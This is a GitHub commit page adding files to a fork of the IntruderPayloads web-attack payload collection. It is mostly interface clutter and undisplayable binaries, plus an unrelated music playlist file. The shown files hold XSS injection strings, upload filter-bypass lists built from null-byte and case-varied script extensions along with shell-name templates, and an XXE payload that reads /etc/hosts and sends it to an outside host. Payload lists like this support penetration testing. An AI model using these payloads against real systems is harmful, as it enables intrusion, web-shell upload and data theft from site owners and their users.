forked from 1N3/IntruderPayloads
-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
IntruderPayloads by 1N3 @CrowdShield
- Loading branch information
root
committed
May 4, 2016
1 parent
8267419
commit d32b137
Showing
107 changed files
with
1,066 additions
and
0 deletions.
There are no files selected for viewing
Binary file not shown.
%3B%22%3E.jpg){kind=link}
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,46 @@ | ||
| <?xml version="1.0" encoding="ISO-8859-1"?> | ||
| <opml version="1.0"> | ||
| <head> | ||
| <title>playlist.xml</title> | ||
| <dateCreated>Thu, 27 Jul 2000 03:24:18 GMT</dateCreated> | ||
| <dateModified>Fri, 15 Sep 2000 09:01:23 GMT</dateModified> | ||
| <ownerName>Dave Winer</ownerName> | ||
| <ownerEmail>[email protected]</ownerEmail> | ||
| <expansionState>1,3,17</expansionState> | ||
| <vertScrollState>1</vertScrollState> | ||
| <windowTop>164</windowTop> | ||
| <windowLeft>50</windowLeft> | ||
| <windowBottom>672</windowBottom> | ||
| <windowRight>455</windowRight> | ||
| </head> | ||
| <body> | ||
| <outline text="Background"> | ||
| <outline text="I've started to note the songs I was listening to as I was writing DaveNet pieces. "/> | ||
| </outline> | ||
| <outline text="The Last Napster Sunday?"> | ||
| <outline text="Heart of Glass.mp3" type="song" f="Blondie - Heart of Glass.mp3"/> | ||
| <outline text="Manic Monday.mp3" type="song" f="Bangles - Manic Monday.mp3"/> | ||
| <outline text="Everybody Have Fun Tonight.mp3" type="song" f="Wang Chung - Everybody Have Fun Tonight.mp3"/> | ||
| <outline text="She Blinded Me With Science.mp3" type="song" f="Thomas Dolby - She Blinded Me With Science.mp3"/> | ||
| <outline text="Rivers of Babylon (HTC).mp3" type="song" f="Jimmy Cliff - Rivers of Babylon (HTC).mp3"/> | ||
| <outline text="The Tide Is High.mp3" type="song" f="Blondie - The Tide Is High.mp3"/> | ||
| <outline text="Back to the Island.mp3" type="song" f="Leon Russell - Back to the Island.mp3"/> | ||
| <outline text="Lucky Man.mp3" type="song" f="Emerson Lake & Palmer - Lucky Man.mp3"/> | ||
| <outline text="Up on Cripple Creek.mp3" type="song" f="The Band - Up on Cripple Creek.mp3"/> | ||
| <outline text="Crackerbox Palace.mp3" type="song" f="George Harrison - Crackerbox Palace.mp3"/> | ||
| <outline text="Taxi.Mp3" type="song" f="Harry Chapin - Taxi.Mp3"/> | ||
| <outline text="Thick As A Brick.mp3" type="song" f="Jethro Tull-Thick As A Brick.mp3"/> | ||
| <outline text="Riding With the King.mp3" type="song" f="B. B. King & Eric Clapton - Riding With the King - 11 - Hold On Im Coming.mp3"/> | ||
| </outline> | ||
| <outline text="The Thrill is Gone?"> | ||
| <outline text="Shaft.MP3" type="song" f="Isaac Hayes - Shaft.MP3"/> | ||
| <outline text="Superfly.mp3" type="song" f="Curtis Mayfield -- Superfly.mp3"/> | ||
| <outline text="Rivers of Babylon (HTC).mp3" type="song" f="Jimmy Cliff - Rivers of Babylon (HTC).mp3"/> | ||
| <outline text="The Harder They Come.mp3" type="song" f="Jimmy Cliff - The Harder They Come.mp3"/> | ||
| <outline text="The Revolution Will Not Be Televised.mp3" type="song" f="Gil Scott Heron - The Revolution Will Not Be Televised.mp3"/> | ||
| <outline text="The Thrill Is Gone.mp3" type="song" f="BB King - The Thrill Is Gone.mp3"/> | ||
| <outline text="Hit Me with Your Rhythm Stick.mp3" type="song" f="Ian Drury & the Blockheads - Hit Me with Your Rhythm Stick.mp3"/> | ||
| </outline> | ||
| </body> | ||
| </opml> | ||
|
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1 @@ | ||
| test test test <script>alert(1)</script> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1 @@ | ||
| "><svg onload=prompt(1)>,"><svg onload=prompt(1)>,"><svg onload=prompt(1)>,"><svg onload=prompt(1)>,"><svg onload=prompt(1)> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1 @@ | ||
| test test test <script>alert(1)</script> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1 @@ | ||
| "><svg onload=prompt(1)>,"><svg onload=prompt(1)>,"><svg onload=prompt(1)>,"><svg onload=prompt(1)>,"><svg onload=prompt(1)> |
Binary file not shown.
%3E.jpg){kind=link}
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
%3B.jpg){kind=link}
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
%3B.jpg){kind=link}
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
%3B.jpg){kind=link}
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
%3B.jpg){kind=link}
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
%253E%2500.png){kind=link}
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
%253E%250a%250f.png){kind=link}
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
%253E%250a.png){kind=link}
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
%253E.png){kind=link}
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
_.jpg){kind=link}
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
%2522a%3D%2522.jpg){kind=link}
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file not shown.
%2B'.jpg){kind=link}
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file not shown.
Empty file.
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file not shown.
Binary file not shown.
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file not shown.
Empty file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1 @@ | ||
| test test test <script>alert(1)</script> |
Empty file.
Binary file not shown.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1 @@ | ||
| /pentest/web_payloads/upload/svg-xss-xml.svg |
%3Eset.jpg){kind=link}
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
_set.jpg){kind=link}
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file not shown.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,30 @@ | ||
| asp | ||
| aspx | ||
| asa | ||
| aSP | ||
| aSpx | ||
| aSa | ||
| asp%20%20%20 | ||
| aspx%20%20%20 | ||
| asa%20%20%20 | ||
| aSP%20%20%20 | ||
| aSpx%20%20%20 | ||
| aSa%20%20%20 | ||
| asp...... | ||
| aspx...... | ||
| asa...... | ||
| aSP...... | ||
| aSpx...... | ||
| aSa...... | ||
| asp%20%20%20...%20.%20.. | ||
| aspx%20%20%20...%20.%20.. | ||
| asa%20%20%20...%20.%20.. | ||
| aSP%20%20%20...%20.%20.. | ||
| aSpx%20%20%20...%20.%20.. | ||
| aSa%20%20%20...%20.%20.. | ||
| asp%00 | ||
| aspx%00 | ||
| asa%00 | ||
| aSp%00 | ||
| aSpx%00 | ||
| aSa%00 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,40 @@ | ||
| cfm | ||
| cfml | ||
| cfc | ||
| dbm | ||
| cFm | ||
| cFml | ||
| cFc | ||
| dBm | ||
| cfm%20%20%20 | ||
| cfml%20%20%20 | ||
| cfc%20%20%20 | ||
| dbm%20%20%20 | ||
| cFm%20%20%20 | ||
| cFml%20%20%20 | ||
| cFc%20%20%20 | ||
| dBm%20%20%20 | ||
| cfm...... | ||
| cfml...... | ||
| cfc....... | ||
| dbm...... | ||
| cFm...... | ||
| cFml...... | ||
| cFc...... | ||
| dBm...... | ||
| cfm%20%20%20...%20.%20.. | ||
| cfml%20%20%20...%20.%20.. | ||
| cfc%20%20%20...%20.%20.. | ||
| dbm%20%20%20...%20.%20.. | ||
| cFm%20%20%20...%20.%20.. | ||
| cFml%20%20%20...%20.%20.. | ||
| cFc%20%20%20...%20.%20.. | ||
| dBm%20%20%20...%20.%20.. | ||
| cfm%00 | ||
| cfml%00 | ||
| cfc%00 | ||
| dbm%00 | ||
| cFm%00 | ||
| cFml%00 | ||
| cFc%00 | ||
| dBm%00 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,50 @@ | ||
| jsp | ||
| jspx | ||
| jsw | ||
| jsv | ||
| jspf | ||
| jSp | ||
| jSpx | ||
| jSw | ||
| jSv | ||
| jSpf | ||
| jSp%00 | ||
| jSp%20%20%20 | ||
| jSp%20%20%20...%20.%20..a | ||
| jSp...... | ||
| jSpf%00 | ||
| jSpf%20%20%20 | ||
| jSpf%20%20%20...%20.%20..a | ||
| jSpf...... | ||
| jSpx%00 | ||
| jSpx%20%20%20 | ||
| jSpx%20%20%20...%20.%20..a | ||
| jSpx...... | ||
| jSv%00 | ||
| jSv%20%20%20 | ||
| jSv%20%20%20...%20.%20..a | ||
| jSv...... | ||
| jSw%00 | ||
| jSw%20%20%20 | ||
| jSw%20%20%20...%20.%20..a | ||
| jSw...... | ||
| jsp%00 | ||
| jsp%20%20%20 | ||
| jsp%20%20%20...%20.%20..a | ||
| jsp...... | ||
| jspf%00 | ||
| jspf%20%20%20 | ||
| jspf%20%20%20...%20.%20..a | ||
| jspf...... | ||
| jspx%00 | ||
| jspx%20%20%20 | ||
| jspx%20%20%20...%20.%20..a | ||
| jspx...... | ||
| jsv%00 | ||
| jsv%20%20%20 | ||
| jsv%20%20%20...%20.%20..a | ||
| jsv...... | ||
| jsw%00 | ||
| jsw%20%20%20 | ||
| jsw%20%20%20...%20.%20..a | ||
| jsw...... |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,33 @@ | ||
| # .pm .lib cannot be called directly, must be called as modules | ||
| pl | ||
| pm | ||
| cgi | ||
| pL | ||
| pM | ||
| cGi | ||
| lib | ||
| lIb | ||
| cGi%00 | ||
| cGi%20%20%20 | ||
| cGi...... | ||
| cgi%00 | ||
| cgi%20%20%20 | ||
| cgi...... | ||
| lIb%00 | ||
| lIb%20%20%20 | ||
| lIb...... | ||
| lib%00 | ||
| lib%20%20%20 | ||
| lib...... | ||
| pL%00 | ||
| pL%20%20%20 | ||
| pL...... | ||
| pM%00 | ||
| pM%20%20%20 | ||
| pM...... | ||
| pl%00 | ||
| pl%20%20%20 | ||
| pl...... | ||
| pm%00 | ||
| pm%20%20%20 | ||
| pm...... |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,60 @@ | ||
| phtml | ||
| php | ||
| php3 | ||
| php4 | ||
| php5 | ||
| inc | ||
| pHtml | ||
| pHp | ||
| pHp3 | ||
| pHp4 | ||
| pHp5 | ||
| iNc | ||
| iNc%00 | ||
| iNc%20%20%20 | ||
| iNc%20%20%20...%20.%20.. | ||
| iNc...... | ||
| inc%00 | ||
| inc%20%20%20 | ||
| inc%20%20%20...%20.%20.. | ||
| inc...... | ||
| pHp%00 | ||
| pHp%20%20%20 | ||
| pHp%20%20%20...%20.%20.. | ||
| pHp...... | ||
| pHp3%00 | ||
| pHp3%20%20%20 | ||
| pHp3%20%20%20...%20.%20.. | ||
| pHp3...... | ||
| pHp4%00 | ||
| pHp4%20%20%20 | ||
| pHp4%20%20%20...%20.%20.. | ||
| pHp4...... | ||
| pHp5%00 | ||
| pHp5%20%20%20 | ||
| pHp5%20%20%20...%20.%20.. | ||
| pHp5...... | ||
| pHtml%00 | ||
| pHtml%20%20%20 | ||
| pHtml%20%20%20...%20.%20.. | ||
| pHtml...... | ||
| php%00 | ||
| php%20%20%20 | ||
| php%20%20%20...%20.%20.. | ||
| php...... | ||
| php3%00 | ||
| php3%20%20%20 | ||
| php3%20%20%20...%20.%20.. | ||
| php3...... | ||
| php4%00 | ||
| php4%20%20%20 | ||
| php4%20%20%20...%20.%20.. | ||
| php4...... | ||
| php5%00 | ||
| php5%20%20%20 | ||
| php5%20%20%20...%20.%20.. | ||
| php5...... | ||
| phtml%00 | ||
| phtml%20%20%20 | ||
| phtml%20%20%20...%20.%20.. | ||
| phtml...... |
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1 @@ | ||
| <!ENTITY % data SYSTEM "file:///etc/hosts"><!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://xerosecurity.com/.testing/xxe_vuln.html?%data;'>"> |
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
9 changes: 9 additions & 0 deletions
9
uploads/file-ul-filter-bypass-commonly-writable-directories.txt
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,9 @@ | ||
| templates_compiled | ||
| templates_c | ||
| templates | ||
| temporary | ||
| images | ||
| cache | ||
| temp | ||
| files | ||
| tmp |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,9 @@ | ||
| # {ASPSCRIPT}gets regex replaced with the shell or other file you are trying to upload, {EXT} should be brute-forced with payloads from discovery/filename-bruteforce/file-extensions/, since some file upload types may be allowed that are not listed. | ||
| {ASPSCRIPT} | ||
| {ASPSCRIPT}.{EXT} | ||
| {ASPSCRIPT}; | ||
| {ASPSCRIPT};.{EXT} | ||
| {ASPSCRIPT}%00 | ||
| {ASPSCRIPT}%00.{EXT} | ||
| {ASPSCRIPT}::data%00. | ||
| {ASPSCRIPT}::data%00.{EXT} |
Oops, something went wrong.